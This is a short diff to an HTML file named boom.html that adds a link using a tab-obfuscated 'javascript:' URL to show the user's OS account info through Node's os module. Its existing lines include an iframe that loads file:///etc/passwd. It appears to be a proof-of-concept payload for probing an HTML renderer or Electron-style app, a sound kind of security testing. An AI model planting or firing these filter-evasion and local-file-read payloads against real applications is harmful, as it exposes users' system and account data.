--- a/boom.html
+++ b/boom.html
@@ -1,3 +1,7 @@
+<a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>
+
+
+
 <iframe 
   src="file:///etc/passwd" 
   width="100%" 
